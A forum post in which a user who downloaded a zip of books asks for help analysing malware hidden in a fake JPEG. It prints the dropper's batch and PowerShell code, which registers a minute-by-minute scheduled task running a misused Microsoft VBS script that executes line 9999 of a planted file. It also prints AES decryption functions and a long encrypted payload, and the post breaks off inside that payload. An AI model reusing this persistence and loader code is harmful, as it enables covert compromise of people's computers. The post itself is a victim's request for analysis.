# Has been infected with what seems like Poweshell Script

Tags: powershell, analysis, malware, exploit

I downloaded some book collections as a zip which had some legitimate jpegs and 1 fake jpeg which was a text file that had multiple spam lines and periodically hidden code lines.I want to understand what it does, can anyone help ? Especially the command "hackbacktrack". Heres the code:

```
@echo off
attrib -s -h -a /s /d *.*
attrib -s -h -a /s /d MyDownlaod\*.*
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"  -ExecutionPolicy Bypass ; sleep 2 ;
try{ $ts = New-Object -ComObject Schedule.Service ; $pcname = (Get-CimInstance -ClassName Win32_ComputerSystem).Name ;
$ts.Connect() ; $MASK = $ts.NewTask(0) ;
$reginfo = $MASK.RegistrationInfo ;
$reginfo.Description = '' ; $reginfo.Author = '' ;
$principal = $MASK.Principal ; $principal.LogonType = 3 ;
$settings = $MASK.Settings ; $settings.Enabled = $true ;
$settings.StartWhenAvailable = $true ; $settings.Hidden = $false ;
$settings.DisallowStartIfOnBatteries = $false ;$settings.StopIfGoingOnBatteries = $false ;
$settings.MultipleInstances = 2 ; $settings.ExecutionTimeLimit = """PT0H""" ;
$startTrigger=$MASK.Triggers.Create(2) ; $startTrigger.Enabled=$true ;
$startTrigger.Repetition.Interval="""PT1M""" ; $startTrigger.Repetition.Duration="""PT1M""" ;
$startTrigger.Repetition.StopAtDurationEnd=$false ; $startTrigger.Id="""DailyTriggerId""" ; 
$startTrigger.StartBoundary = (Get-Date).AddMinutes(15).tostring('yyyy-MM-ddTHH:mm:ss');$action_ = $MASK.Actions.Create(0) ;
$action_.Path = '%%appdata%%\Microsoft\SyncAppvPublishingServer.vbs' ; $action_.Arguments = '"""n;
$a = Get-Content """C:\Users\Public\%ComputerName%.txt""" | Select -Index 9999;iex $a; hackbacktrack """rmu9w4ZSVzcfyb27IrX+tYtgvBO3HymxEtL1vlLfDSk="""""' ;
$ts.GetFolder("""\\""").RegisterTaskDefinition("""$pcname""", $MASK, 6 , $null, $null, 3) ; } Catch [System.Exception]{} exit ;
DEL *.lnk
copy "MyDownlaod\xLog_file.jpeg" "C:\Users\Public\%ComputerName%.txt"
copy "MyDownlaod\xLogfile.jpeg" "%appdata%\microsoft\SyncAppvPublishingServer.vbs"
rename "%username%.bat" Zz_File_Cover.jpeg
exit
```

Update regarding contains This is the contains of xLog_file.jpeg.

```
'---------------------------------------------------------------------------------------------
' Copyright: Microsoft Corp.
'
' This script is designed to be used only for scheduled tasks(s).
' There is no extensive error check, and will not dump the output from the Powershell CmdLet.
'
' Usage: SyncAppvPublishingServer {cmdline-args(passthrough to cmdlet)}
'---------------------------------------------------------------------------------------------

Option Explicit


Dim g_cmdArgs
g_cmdArgs = ""


' main entrance

' Enable error handling
On Error Resume Next

ParseCmdLine

if g_cmdArgs = "" Then
    Wscript.echo "Command line arguments are required."
    Wscript.quit 0
End If  
    

Dim syncCmd
syncCmd = "$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); " & _
          "import-module AppvClient; " & _
          "Sync-AppvPublishingServer " & g_cmdArgs

Dim psCmd
psCmd = "powershell.exe -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{" & syncCmd & "}"


Dim WshShell
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run psCmd, 0


' Reset error handling
On Error Goto 0
WScript.Quit 0


    
'---------------------------------------------------------------------------------------------
' Sub:  ParseCmdLine
'       Reading the parameters provided by the user in the command line
'---------------------------------------------------------------------------------------------
Sub ParseCmdLine()

    dim objArgs
    dim argsCount
    dim x
    
    Set objArgs = Wscript.Arguments
    argsCount = objArgs.count
    
    x = 0
    While x < argsCount
        g_cmdArgs = g_cmdArgs & " " & objArgs(x) 
        x = x + 1
    Wend
    
End Sub
```

After some research, i figured that "Select -Index 9999;iex" stands for 9999 line, and found this code on 9999th line function

```
Create-AesManagedObject($key, $IV) {    $aesManaged = New-Object "System.Security.Cryptography.AesManaged";   
$aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC;   
$aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;   
$aesManaged.BlockSize = 128;   
$aesManaged.KeySize = 256;   
if ($IV) {        if ($IV.getType().Name -eq "String") {            $aesManaged.IV = [System.Convert]::FromBase64String($IV);        }       
else {            $aesManaged.IV = $IV;        }    }    if ($key) {        if ($key.getType().Name -eq "String")
{            $aesManaged.Key = [System.Convert]::FromBase64String($key);        }        else {            $aesManaged.Key = $key;        }    }    $aesManaged;}
function Decrypt-String($key, $encryptedStringWithIV) {    $bytes = [System.Convert]::FromBase64String($encryptedStringWithIV);    $IV = $bytes[0..15];    
$aesManaged = Create-AesManagedObject $key $IV;    $decryptor = $aesManaged.CreateDecryptor();    
$unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16);    
$aesManaged.Dispose();    [System.Text.Encoding]::UTF8.GetString($unencryptedData).Trim([char]0);}
Function hackbacktrack{$encryptedString = "=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